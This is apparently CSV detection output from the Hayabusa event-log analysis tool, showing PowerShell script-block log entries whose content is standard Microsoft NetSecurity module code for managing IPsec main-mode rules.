[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) 
$__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') 
-and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 
'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRec",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and 
config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeRule' -Alias '*' function Set-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters 
$__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact 
($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; V",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = 
$true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeRule' -Alias '*' function Set-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 
[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } 
